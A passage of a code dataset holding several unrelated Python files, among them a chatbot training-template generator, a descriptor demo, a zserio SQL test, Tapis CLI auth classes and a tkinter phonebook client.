ResultsDir,'plot_f_r_PL_I_Krange_[%3.2f_%3.2f]_%s_%d' % ( KI_Equ_min, KI_Equ_max, suffix_Cis, alpha)),'w') \nfor p in range(radlong): \n file2.write('%30.20E' % radial[p])\n file2.write('%30.20E ' % Uref.PL.I.f_r[p])\n file2.write(' \\n' )\n\nfile2.close()\n\nfile2=open(os.path.join( ResultsDir,'plot_g_theta_PL_I_Krange_[%3.2f_%3.2f]_%s_%d' % ( KI_Equ_min, KI_Equ_max, suffix_Cis, alpha)),'w')\ntheta= -Pi\nfor p in range(thetalong): \n file2.write('%30.20E ' % theta) \n file2.write('%30.20E ' % Uref.PL.I.g_theta_x[p]) \n file2.write('%30.20E ' % Uref.PL.I.g_theta_y[p]) \n file2.write(' \\n' ) \n theta += 2*Pi/(thetalong-1)\n\nfile2.close()\n\n","sub_path":"src_Post_Proc/POD_r_theta_PL_I.py","file_name":"POD_r_theta_PL_I.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"299189953","text":"# coding: utf-8\ntry:\n from .access_django import *\nexcept:\n from access_django import *\nimport random\nfrom django.template import Context, Template\nfrom utils.nlg import *\nfrom utils.tagger import *\nfrom utils.query import *\n# Templates\n# possible_slots = [\n# 'title',\n# 'when',\n# 'instructor',\n# 'classroom',\n# 'designated_for',\n# 'required_elective',\n# 'sel_method'\n# ]\nbe = ['', '是']\nask = ['', '請問', '告訴我', '跟我說', '想知道']\n\ntemplates = {\n 'request_title': [\n Template('{{ask}}有開哪些課'),\n Template('{{ask}}有哪些課'),\n Template('{{ask}}有開什麼課'),\n Template('{{ask}}{{instructor}}在{{when}}有哪些課'),\n Template('{{ask}}{{instructor}}有開哪些課'),\n Template('{{ask}}{{instructor}}有開什麼課'),\n Template('{{ask}}{{designated_for}}在{{when}}有哪些課'),\n Template('{{ask}}{{designated_for}}有開哪些課'),\n Template('{{ask}}{{designated_for}}{{instructor}}老師有開哪些課'),\n Template('{{ask}}{{when}}有哪些課'),\n Template('{{ask}}{{when}}{{designated_for}}有開哪些課'),\n Template('{{ask}}加簽方式是{{sel_method}}的課有哪些'),\n Template('{{ask}}{{when}}加簽方式是{{sel_method}}的課有哪些'),\n Template('{{ask}}{{when}}在{{classroom}}上課的是哪一門課'),\n ],\n 'request_instructor': [\n Template('{{ask}}老師是誰'),\n Template('{{ask}}老師是哪位'),\n Template('{{ask}}開{{title}}的老師是哪位'),\n Template('{{ask}}是誰開的'),\n Template('{{ask}}{{title}}這堂課的老師是哪位'),\n Template('{{ask}}哪位教授開的'),\n 
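POD_r_theta in the POD_r_theta_PL_I.py record above (its implementation is not shown) factors a field U(r, theta) into a radial profile f(r) and angular profiles g(theta). The usual way to build such a helper is a rank-1 truncation of the SVD; a sketch on random stand-in data:

import numpy as np

# U plays the role of Uref.PL.I.x sampled on a (radlong x thetalong) grid
radlong, thetalong = 50, 72
U = np.random.rand(radlong, thetalong)

# SVD gives U = f @ diag(s) @ gT; the leading column/row is the dominant mode
f, s, gT = np.linalg.svd(U, full_matrices=False)
f_r = f[:, 0] * np.sqrt(s[0])       # dominant radial mode
g_theta = gT[0, :] * np.sqrt(s[0])  # dominant angular mode

# residual of the rank-1 separation U ~ outer(f_r, g_theta)
print(np.linalg.norm(U - np.outer(f_r, g_theta)))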
Template('{{ask}}教授是誰'),\n Template('{{ask}}是誰教的'),\n Template('{{ask}}{{designated_for}}的{{title}}是誰上的'),\n Template('{{ask}}{{designated_for}}的{{title}}是誰教的'),\n Template('{{ask}}{{designated_for}}的{{title}}是哪位教授'),\n Template('{{ask}}{{when}}{{designated_for}}的{{title}}是誰上的'),\n Template('{{ask}}{{when}}{{designated_for}}的{{title}}是誰教的'),\n Template('{{ask}}{{when}}{{designated_for}}的{{title}}是哪位教授'),\n\n ],\n 'request_schedule_str': [\n Template('什麼時候的課'),\n Template('上課時間在什麼時候'),\n Template('什麼時候上課'),\n Template('星期幾上課'),\n Template('幾點上課'),\n Template('第幾節的課'),\n Template('上課時間'),\n Template('在第幾節'),\n Template('{{title}}的上課時間'),\n Template('{{title}}幾點上課'),\n Template('{{title}}在哪天上課'),\n Template('{{title}}是星期幾的課'),\n Template('{{title}}是第幾節的課'),\n Template('{{title}}課上課時間'),\n Template('{{title}}課幾點上課'),\n Template('{{title}}課在哪天上課'),\n Template('{{title}}課是星期幾的課'),\n Template('{{title}}課是第幾節的課'),\n Template('星期幾有{{title}}'),\n Template('什麼時候有{{title}}'),\n Template('星期幾有{{title}}課'),\n Template('什麼時候有{{title}}課'),\n Template('星期幾有{{title}}的課'),\n Template('{{instructor}}在星期幾有課'),\n Template('星期幾有{{instructor}}老師的課'),\n Template('什麼時候有{{instructor}}老師的課'),\n Template('{{instructor}}老師的{{title}}課在什麼時候'),\n Template('{{instructor}}老師的{{title}}課在什麼時候上課'),\n Template('{{instructor}}老師的{{title}}課在星期幾'),\n Template('{{instructor}}老師的{{title}}課在幾點'),\n Template('{{instructor}}老師的{{title}}課在什麼時間'),\n Template('{{instructor}}老師的{{title}}課在什麼時間上課'),\n ],\n 'request_classroom': [\n Template('在哪裡上課'),\n Template('教室在哪'),\n Template('哪間教室'),\n Template('在哪邊上'),\n Template('{{title}}在哪裡上課'),\n Template('{{title}}課在哪裡上課'),\n Template('{{title}}的上課教室在哪'),\n Template('{{title}}課的上課教室在哪'),\n Template('{{title}}的教室在哪'),\n Template('{{title}}課的教室在哪'),\n Template('{{title}}課的教室'),\n Template('{{title}}的教室'),\n Template('{{title}}的上課地點'),\n Template('{{title}}的地點'),\n Template('在那裡上{{title}}'),\n Template('{{instructor}}的課在哪間教室'),\n Template('{{instructor}}的課在哪裡'),\n Template('{{instructor}}老師{{when}}的課在哪間教室'),\n Template('{{instructor}}老師{{when}}的課在哪裡'),\n Template('{{instructor}}老師{{when}}的課在哪間教室上課'),\n Template('{{instructor}}老師{{when}}的課在哪裡上課'),\n Template('{{instructor}}教授{{when}}的課在哪間教室'),\n Template('{{instructor}}教授{{when}}的課在哪裡'),\n Template('{{instructor}}教授{{when}}的課在哪間教室上課'),\n Template('{{instructor}}教授{{when}}的課在哪裡上課'),\n Template('{{when}}{{instructor}}老師的課在哪間教室'),\n Template('{{when}}{{instructor}}老師的課在哪裡上課'),\n Template('{{when}}{{instructor}}老師的課在哪裡'),\n Template('{{when}}{{instructor}}教授的課在哪間教室'),\n Template('{{when}}{{instructor}}教授的課在哪裡上課'),\n Template('{{when}}{{instructor}}教授的課在哪裡')\n\n ],\n 'request_review': [\n Template('{{title}}的評價如何'),\n Template('有沒有{{title}}的評價'),\n Template('{{instructor}}的評價如何'),\n Template('這堂課怎麼樣'),\n Template('{{title}}這堂課的評價怎樣'),\n Template('{{title}}的評價好嗎'),\n Template('大家怎麼看{{title}}這堂課呢'),\n Template('{{title}}這堂課好不好'),\n Template('大家修{{title}}這堂課的評價如何'),\n Template('有討論{{title}}的文章嗎'),\n Template('有討論{{title}}這堂課的文章嗎'),\n Template('{{instructor}}老師的評價如何'),\n Template('大家覺得{{instructor}}老師的評價如何'),\n Template('大家覺得{{instructor}}老師的評價怎樣'),\n Template('{{instructor}}老師的評價'),\n Template('有討論{{instructor}}老師文章嗎')\n ],\n 'request_designated_for': [\n Template('{{title}}是哪個系開的'),\n Template('{{title}}是哪個系所開的'),\n Template('什麼系開的'),\n Template('什麼系所的課'),\n Template('{{title}}是��個系的課'),\n Template('{{title}}是哪個系所的課'),\n Template('哪個系開{{title}}這堂課'),\n Template('哪個系開{{title}}'),\n Template('哪個系所開{{title}}這堂課'),\n Template('哪個系所有開{{title}}這堂課'),\n 
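The generate_template.py record renders Django templates outside a web project. Standalone use of django.template only works after settings are configured; a minimal sketch of the record's render pattern (the TEMPLATES stanza here is the bare minimum, not the project's actual settings):

import django
from django.conf import settings

# configure a single Django template backend before importing Template
settings.configure(TEMPLATES=[{"BACKEND": "django.template.backends.django.DjangoTemplates"}])
django.setup()

from django.template import Context, Template

# one of the question templates from the record, filled from a course dict
tpl = Template('{{ask}}{{instructor}}有開哪些課')
print(tpl.render(Context({'ask': '請問', 'instructor': '吳俊傑'})))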
Template('{{instructor}}在哪個系有開課'),\n Template('{{instructor}}在哪個系所有開課')\n\n ],\n 'request_required_elective': [\n Template('是必修還選修'),\n Template('是{{designated_for}}必修嗎?'),\n Template('{{designated_for}}的必修嗎?'),\n Template('{{title}}是{{designated_for}}的必修嗎'),\n Template('{{title}}是{{designated_for}}的必修課嗎'),\n Template('{{title}}是必修嗎'),\n Template('{{instructor}}有開必修課嗎'),\n Template('{{when}}有{{designated_for}}的必修課嗎'),\n Template('有{{instructor}}開的必修課嗎')\n\n ],\n 'request_sel_method': [\n Template('{{title}}的加選方式是什麼'),\n Template('{{title}}的加選方式?'),\n Template('{{title}}如何加選?'),\n Template('{{title}}要怎麼加選?'),\n Template('{{title}}怎樣加簽?'),\n Template('{{instructor}}會開放加簽嗎?'),\n Template('{{instructor}}有開放加簽嗎'),\n Template('{{instructor}}會不會簽人'),\n Template('{{instructor}}通常會不會加簽'),\n Template('{{title}}這堂課要怎麼加簽?'),\n Template('{{title}}這堂課的加選方式是什麼'),\n Template('{{title}}這堂課的加選方式?'),\n Template('{{title}}這堂課如何加選?'),\n Template('{{title}}這堂課要怎麼加選?'),\n Template('{{title}}這堂課怎樣加簽?'),\n Template('{{title}}怎樣加簽?')\n ],\n 'inform': [\n Template('{{be}}{{title}}'),\n Template('叫{{title}}'),\n Template('叫做{{title}}'),\n Template('{{title}}喔'),\n Template('{{be}}{{when}}'),\n Template('{{be}}{{when}}的課'),\n Template('{{be}}{{when}}上課'),\n Template('{{be}}{{when}}上的'),\n Template('{{be}}{{instructor}}'),\n Template('{{be}}{{instructor}}老師'),\n Template('{{be}}{{instructor}}教授'),\n Template('{{be}}{{instructor}}的課'),\n Template('{{be}}{{classroom}}'),\n Template('在{{classroom}}上課'),\n Template('上課地點是{{classroom}}'),\n Template('教室在{{classroom}}'),\n Template('{{be}}{{designated_for}}'),\n Template('{{be}}{{designated_for}}開的'),\n Template('{{be}}{{designated_for}}的課'),\n Template('{{be}}{{designated_for}}上的'),\n Template('{{be}}{{required_elective}}'),\n Template('{{be}}{{required_elective}}課'),\n Template('{{be}}{{required_elective}}的課'),\n Template('{{be}}{{sel_method}}'),\n Template('加選方法{{be}}{{sel_method}}'),\n Template('選課方法{{be}}{{sel_method}}'),\n Template('{{be}}{{sel_method}}'),\n ],\n 'inform_unknown': [ # prevent infinite loop\n Template('不知道'),\n Template('我不知道'),\n Template('不知道耶'),\n Template('我真的不知道啦'),\n Template('不清楚'),\n Template('我不清楚'),\n Template('我真的不清楚'),\n Template('不知'),\n Template('不確定'),\n Template('我知道還要問你嗎'),\n Template('不要問我'),\n Template('別問我'),\n Template('我怎麼知道')\n ],\n 'thanks': [\n Template('謝謝'),\n Template('感謝你'),\n Template('感恩'),\n ],\n 'deny': [\n Template('錯了'),\n Template('爛耶'),\n Template('太爛了吧'),\n Template('大錯特錯'),\n ],\n 'closing': [\n Template('再見'),\n ],\n 'other': [\n Template('快被當了怎模辦QQ'),\n Template('什麼時候可以停修QQ'),\n Template('學海無涯,回頭是岸'),\n Template('想畢業'),\n Template('我不想上課QQ'),\n Template('想耍廢'),\n Template('我好廢怎麼辦'),\n Template('人生好困難'),\n Template('智商不夠好痛苦'),\n Template('通識搶不到怎麼辦'),\n Template('你可以聰明一點嗎'),\n Template('什麼時候期末考'),\n Template('羨慕大神人生都沒有挫折'),\n Template('好魯'),\n Template('呵呵'),\n Template('我啥都不會'),\n Template('智商不夠可以砍掉重來嗎QQ'),\n Template('ㄎㄅ'),\n Template('是個擅長講幹話的朋友呢'),\n Template('不想看紙'),\n Template('沒錢'),\n Template('給我一把人生重來槍'),\n Template('午餐吃啥'),\n Template('晚餐吃啥'),\n Template('早餐吃啥'),\n Template('冰咖啡買一送一不加糖'),\n Template('這真的可以嗎'),\n Template('���婷大大凱瑞眾生'),\n Template('謝謝大大分享'),\n Template('我好邊緣'),\n Template('樓主一生平安順利'),\n Template('一號餐要薯餅冰那提少冰加糖'),\n Template('麥當當好吃'),\n ]\n}\n\n\ndef trim_course(course):\n course['when'] = random.choice(['星期', '禮拜']) + course['schedule_str'][0]\n course['be'] = random.choice(be)\n course['ask'] = random.choice(ask)\n for k in ['title', 'instructor', 'classroom']:\n course[k] = 
trim_attr(course[k])\n return course\n\nif __name__ == '__main__':\n \"\"\"\n In this format:\n Line1: Intent\n Line2: Tokenized sentence\n Line3: BIO\n ======\n classroom\n 禮拜三 高分子材料概論 在 哪個 系館 哪間 教室 上課 嗎 ?\n B_when B_title O O O O O O O O\n title\n 幫 我 找 吳俊傑 教 哪些 課 ?\n O O O B_instructor O O O O\n \"\"\"\n print('[Info] Start generating templates')\n # TODO Change to argparse\n filename = 'training_template.txt'\n N = 1000\n courses = query_course({}).values() # Get all course\n # TODO Refine request_schedule_str to when\n #\n with open(filename, 'w') as f:\n for intent, tpls in templates.items():\n for tpl in tpls:\n for _ in range(N):\n course = random.choice(courses)\n course = trim_course(course)\n # Jieba cut sentence\n sentence = ' '.join(cut(tpl.render(Context(course))))\n # BIO tagged sentence\n bio_tagged = ' '.join(BIO(sentence, course))\n\n f.write(intent + '\\n')\n f.write(sentence + '\\n')\n f.write(bio_tagged + '\\n')\n","sub_path":"misc_scripts/generate_template.py","file_name":"generate_template.py","file_ext":"py","file_size_in_byte":13574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460972731","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n一个描述器是一个类, 内部定义了方法 __get__, __set__, __delete__ 中的一个或多个\n\na.x 的查找顺序是, a.__dict__['x'] , 然后 type(a).__dict__['x'] , 然后找 type(a) 的父类\n( 不包括元类 (metaclass) ).如果查找到的值是一个描述器, Python 就会调用描述器的方法来重写默认的行为\n\"\"\"\n\n\nclass User(object):\n def __init__(self, name='两点水', sex='男'):\n self.sex = sex\n self.name = name\n\n def __get__(self, obj, objtype):\n print('获取 name 值')\n return self.name\n\n def __set__(self, obj, val):\n print('设置 name 值')\n self.name = val\n\n\nclass MyClass(object):\n x = User('两点水', '男')\n y = 5\n\n\nif __name__ == '__main__':\n m = MyClass()\n user = User('xy', 'male')\n print(m.x) # m.x 是一个 User, 而User是一个descriptor, 可以通过 __get__方法描述\n print(user)\n\n print('\\n')\n\n m.x = '三点水'\n print(m.x) # 此时 x 不是一个描述器了\n\n print('\\n')\n\n print(m.x)\n\n print('\\n')\n\n print(m.y)\n","sub_path":"basic/descriptor_demo.py","file_name":"descriptor_demo.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"588133054","text":"#0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x)\n\nuserstr = str(input(\"원하는 문장을 입력하세요.\")) ##중요 : 문자열로 취급 str()\nstr0 = userstr.replace(' ','')\n\nalphabet = [] #<주의!!!> 빈 리스트 만들기는 [] , 빈 문자열 변수 만들기가 \"\" \n\nfor i in str0:\n for j in range(0,len(alphabet)):\n if i!=alphabet[j]:\n alphabet.append(i)\n\n\nprint(\"입력한 알파벳 : \",alphabet)\n\n#공백제거 함수 뭐였지? 답:https://code.i-harness.com/ko/q/7e310c\n\n#길이 출력하는 함수!! 
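generate_template.py leans on the cut and BIO helpers from utils.tagger, which are not shown. A minimal whitespace-token version of the BIO idea, reproducing the example from the record's docstring (it only tags single-token slot values with B_<slot>; multi-token values would also need I_<slot> continuations, omitted here):

def bio_tags(tokens, slots):
    # tag a token B_<slot> when it equals that slot's value, else O
    tags = ['O'] * len(tokens)
    for slot, value in slots.items():
        for i, token in enumerate(tokens):
            if token == value:
                tags[i] = 'B_' + slot
    return tags

tokens = ['幫', '我', '找', '吳俊傑', '教', '哪些', '課', '?']
print(bio_tags(tokens, {'instructor': '吳俊傑'}))
# ['O', 'O', 'O', 'B_instructor', 'O', 'O', 'O', 'O']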
len(변수)\n","sub_path":"0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x).py","file_name":"0318 입력한 문장에 존재하는 알파벳 모두 골라내기(중복 x).py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"283242924","text":"import unittest\nimport os\n\nfrom testutils import getZserioApi, getApiDir\n\nclass SubtypedTableTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"sql_tables.zs\", expectedWarnings=1)\n cls._fileName = os.path.join(getApiDir(os.path.dirname(__file__)), \"subtyped_table_test.sqlite\")\n\n def setUp(self):\n if os.path.exists(self._fileName):\n os.remove(self._fileName)\n self._database = self.api.TestDb.from_file(self._fileName)\n self._database.create_schema()\n\n def tearDown(self):\n self._database.close()\n\n def testSubtypedTable(self):\n self.assertTrue(self._isTableInDb())\n\n subtypedTable = self._database.subtyped_table\n self.assertTrue(subtypedTable is not None)\n\n def _isTableInDb(self):\n # check if database does contain table\n sqlQuery = \"SELECT name FROM sqlite_master WHERE type='table' AND name='\" + self.TABLE_NAME + \"'\"\n for row in self._database.connection.cursor().execute(sqlQuery):\n if len(row) == 1 and row[0] == self.TABLE_NAME:\n return True\n\n return False\n\n TABLE_NAME = \"subtypedTable\"\n","sub_path":"test/language/sql_tables/python/SubtypedTableTest.py","file_name":"SubtypedTableTest.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455507541","text":"from agavepy.agave import Agave\nfrom .base import TaccApisCommandBase\nimport inspect\n\n__all__ = ['TaccApisBearer', 'TaccApisNoBearer']\n\n\nclass TaccApisBearer(TaccApisCommandBase):\n \"\"\"Base class for Tapis API commands that accept only an access token\n \"\"\"\n def add_common_parser_arguments(self, parser):\n parser = super(TaccApisBearer,\n self).add_common_parser_arguments(parser)\n parser.add_argument('-z',\n '--token',\n dest='access_token',\n metavar='',\n help=\"{0} {1}\".format(self.constants.PLATFORM,\n self.constants.ACCESS_TOKEN))\n return parser\n\n def init_clients(self, parsed_args):\n \"\"\"Override CommandBase to set up client with passed token\n \"\"\"\n client = Agave.restore()\n if parsed_args.access_token is not None:\n self.tapis_client = Agave(api_server=client.api_server,\n token=parsed_args.access_token)\n else:\n self.tapis_client = client\n self.tapis_client.token.refresh()\n self.requests_client = self._get_direct(self.tapis_client)\n return self\n\n\nclass TaccApisNoBearer(TaccApisCommandBase):\n \"\"\"Base class for Tapis API commands that accept only an access token\n \"\"\"\n def add_common_parser_arguments(self, parser):\n parser = super(TaccApisNoBearer,\n self).add_common_parser_arguments(parser)\n return parser\n","sub_path":"tapis_cli/clients/services/taccapis/v2/bearer.py","file_name":"bearer.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"429709982","text":"from tkinter import *\nfrom interface.createHelper import *\n\n\ndef soonBirthday():\n response = requests.get(URL + f\"contacts/?soon=True\")\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n\n\ndef searchBirthday():\n def sendSearch():\n if 
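The SubtypedTableTest record checks for a table by querying sqlite_master. The same lookup in plain stdlib sqlite3, with a parameter placeholder instead of string concatenation and an in-memory database:

import sqlite3

def table_exists(connection, table_name):
    # sqlite_master lists every schema object; filter for tables by name
    sql = "SELECT name FROM sqlite_master WHERE type='table' AND name=?"
    return connection.execute(sql, (table_name,)).fetchone() is not None

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE subtypedTable (id INTEGER PRIMARY KEY)")
assert table_exists(conn, "subtypedTable")
assert not table_exists(conn, "missingTable")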
validDayAndMonth(day.get(), month.get()):\n response = requests.get(URL + f\"contacts/?day={day.get()}&month={month.get()}\")\n if response.status_code != 200 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Нет таких контактов\")\n return\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n else:\n return\n\n searchBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(searchBox, text=\"Введите месяц:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n month = Entry(searchBox, width=31, font=40)\n month.grid(row=0, column=1)\n Label(searchBox, text=\"Введите день:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n day = Entry(searchBox, width=31, font=40)\n day.grid(row=1, column=1)\n Button(searchBox, text='Узнать', bg='#ADFF2F', command=sendSearch).grid(row=34)\n\n\ndef differenceBirthday():\n def GT():\n creatorDifferentOrEqualsFunc(params=\"GT\", number=number, URL=URL, root=differenceBirthdayBox)\n\n def LT():\n creatorDifferentOrEqualsFunc(\"LT\", number=number, URL=URL, root=differenceBirthdayBox)\n\n def equals():\n creatorDifferentOrEqualsFunc(\"equals\", number=number, URL=URL, root=differenceBirthdayBox)\n\n differenceBirthdayBox = createToplevel(500, 150, \"#FFDEAD\", root)\n Label(differenceBirthdayBox, text=\"Введите количество лет:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0,\n column=0)\n number = Entry(differenceBirthdayBox, width=31, font=40)\n number.grid(row=0, column=1)\n Button(differenceBirthdayBox, text='Больше', bg='#ADFF2F', command=GT).grid(row=1)\n Button(differenceBirthdayBox, text='Меньше', bg='#ADFF2F', command=LT).grid(row=2)\n Button(differenceBirthdayBox, text='Равно', bg='#ADFF2F', command=equals).grid(row=3)\n\n\ndef getAge():\n def sendGetAge():\n response = requests.get(URL + f\"contacts/?name={name.get().title()}&surname={surname.get().title()}\")\n if response.status_code != 200 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n else:\n\n messagebox.showinfo(title=\"Успешно\",\n message=f\"Возраст контакта: {age(str(response.json()[0]['birthday']))}\")\n getAgeBox.destroy()\n\n getAgeBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(getAgeBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(getAgeBox, width=31, font=40)\n name.grid(row=0, column=1)\n Label(getAgeBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(getAgeBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Button(getAgeBox, text='Узнать', bg='#ADFF2F', command=sendGetAge).grid(row=34)\n\n\ndef filterContacts():\n def sendFilterContacts():\n correctNumber = number.get()\n if not validNumberAndBirthday(correctNumber):\n return\n if not validNumberAndBirthday(birthday=birthday.get()):\n return\n if not validData(birthday.get()):\n return\n if re.match(r\"\\+7\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\", str(correctNumber)):\n correctNumber = correctNumber[2:]\n correctNumber = '8' + correctNumber\n requestsText = f\"{URL}contacts/?\"\n if name.get() != \"\":\n requestsText += f\"name={name.get().title()}&\"\n if surname.get() != \"\":\n requestsText += f\"surname={surname.get().title()}&\"\n if birthday.get() != \"\":\n requestsText += f\"birthday={birthday.get()}&\"\n if number.get() != \"\":\n requestsText += 
f\"numbers={correctNumber}&\"\n response = requests.get(requestsText)\n if response.json() == [] or response.status_code != 200:\n messagebox.showerror(title=\"Ошибка\", message=\"Нет таких контактов\")\n else:\n sendFilterBox = createToplevel(600, 400, \"#FF00FF\", root=root)\n frame = createScrollFrame(sendFilterBox, \"#FF00FF\")\n enterContacts(frame=frame, contacts=response.json())\n\n filterContactsBox = createToplevel(500, 300, \"#FFDEAD\", root=root)\n Label(filterContactsBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(filterContactsBox, width=31, font=40)\n name.grid(row=0, column=1)\n Label(filterContactsBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(filterContactsBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Label(filterContactsBox, text=\"Введите Дату рождения:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=2, column=0)\n birthday = Entry(filterContactsBox, width=31, font=40)\n birthday.grid(row=2, column=1)\n Label(filterContactsBox, text=\"Введите Номер:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=3, column=0)\n number = Entry(filterContactsBox, width=31, font=40)\n number.grid(row=3, column=1)\n Label(filterContactsBox, text=\"Заполните нужные поля:\", font=40, bg='#FFDEAD').grid(row=4, column=0)\n Button(filterContactsBox, text='Отфильтровать', bg='#ADFF2F', command=sendFilterContacts).grid(row=4, column=1)\n\n\ndef deleteContactByNumber():\n def sendContactDelete():\n def sendContacts():\n for count, contact in enumerate(contactsDelete):\n if checkboxs[count].get() == 1:\n requests.delete(URL + f\"contactDelete/{contact}\")\n messagebox.showinfo(title=\"Успешно\", message=\"Контакт удалён\")\n deletsBox.destroy()\n\n correctNumber = number.get()\n if not validNumberAndBirthday(correctNumber=correctNumber):\n return\n if correctNumber[0] == \"+\":\n correctNumber = \"8\" + correctNumber[2:]\n response = requests.get(URL + f\"contacts/?numbers={correctNumber}\")\n if response.status_code == 204 or response.status_code == 404 or response.json() == []:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким номером нет\")\n else:\n deleteContactBox.destroy()\n deletsBox = createToplevel(700, 700, \"#FF00FF\", root=root)\n frame = createScrollFrame(deletsBox, \"#FF00FF\")\n checkboxs, contactsDelete, countRow = chooseContacts(frame=frame, contacts=response.json())\n Button(frame, text='Удалить', bg='#ADFF2F', command=sendContacts).grid(row=countRow + 2)\n\n deleteContactBox = createToplevel(500, 150, \"#FFDEAD\", root)\n Label(deleteContactBox, text=\"Введите Номер:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n number = Entry(deleteContactBox, width=31, font=40)\n number.grid(row=0, column=1)\n Button(deleteContactBox, text='Удалить', bg='#ADFF2F', command=sendContactDelete).grid(row=1)\n\n\ndef deleteContactByNameAndSurname():\n def sendContactDelete():\n response = requests.delete(URL + f\"contactDelete/{name.get().title()}&{surname.get().title()}\")\n if response.status_code == 204 or response.status_code == 404:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n else:\n messagebox.showinfo(title=\"Успешно\", message=\"Контакт удалён\")\n deleteContactBox.destroy()\n\n deleteContactBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(deleteContactBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n name = Entry(deleteContactBox, 
width=31, font=40)\n name.grid(row=0, column=1)\n Label(deleteContactBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surname = Entry(deleteContactBox, width=31, font=40)\n surname.grid(row=1, column=1)\n Button(deleteContactBox, text='Удалить', bg='#ADFF2F', command=sendContactDelete).grid(row=34)\n\n\ndef updateContact():\n def sendContactUpdate():\n def sendContact():\n if creatorSendContact(URL=URL, name=name, surname=surname, birthday=birthday, numbers=numbers,\n isUpdate=True, updateName=intputName, updateSurname=inputSurname):\n createContactsBox.destroy()\n\n inputSurname = surnameInst.get()\n intputName = nameInst.get()\n response = requests.get(URL + f\"contacts/?name={intputName.title()}&surname={inputSurname.title()}\")\n if response.json() != [] or response.status_code != 200:\n updateContactBox.destroy()\n createContactsBox = createToplevel(500, 840, \"#FFDEAD\", root=root)\n name, surname, birthday, numbers = creatorFieldsForContact(createContactsBox, response=response)\n Button(createContactsBox, text='Обновить', bg='#ADFF2F', command=sendContact).grid(row=34)\n else:\n messagebox.showerror(title=\"Ошибка\", message=\"Контакта с таким именим и фамилией нет\")\n\n updateContactBox = createToplevel(500, 200, \"#FFDEAD\", root)\n Label(updateContactBox, text=\"Введите Имя:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=0, column=0)\n nameInst = Entry(updateContactBox, width=31, font=40)\n nameInst.grid(row=0, column=1)\n Label(updateContactBox, text=\"Введите Фамилию:\", font=40, bg='#FFDEAD', justify=LEFT).grid(row=1, column=0)\n surnameInst = Entry(updateContactBox, width=31, font=40)\n surnameInst.grid(row=1, column=1)\n Button(updateContactBox, text='Обновить', bg='#ADFF2F', command=sendContactUpdate).grid(row=34)\n\n\ndef createContacts():\n def sendContact():\n if creatorSendContact(URL=URL, name=name, surname=surname, birthday=birthday, numbers=numbers):\n createContactsBox.destroy()\n return\n\n createContactsBox = createToplevel(500, 840, \"#FFDEAD\", root=root)\n name, surname, birthday, numbers = creatorFieldsForContact(createContactsBox=createContactsBox)\n Button(createContactsBox, text='Создать', bg='#ADFF2F', command=sendContact).grid(row=34)\n\n\ndef getAllContacts():\n response = requests.get(URL + \"contacts/\")\n if response.json() == [] or response.status_code != 200:\n messagebox.showerror(title=\"Ошибка\", message=\"На данный момент в базе данных нет контактов\")\n else:\n allContactsBox = createToplevel(600, 400, \"#FFC0CB\", root=root)\n frame = createScrollFrame(allContactsBox, \"#FFC0CB\")\n enterContacts(frame=frame, contacts=response.json())\n\n\nif __name__ == '__main__':\n root = Tk()\n\n root['bg'] = '#fafafa'\n URL = \"http://127.0.0.1:8000/api/\"\n\n root.title('Телефонный справочник')\n root.geometry('600x400')\n root.resizable(width=False, height=False)\n\n frame = Frame(root, bg='#00FFFF')\n frame.place(relwidth=1, relheight=1)\n (Label(frame, text=\"Главное Меню\", font=100, bg='#00FFFF', 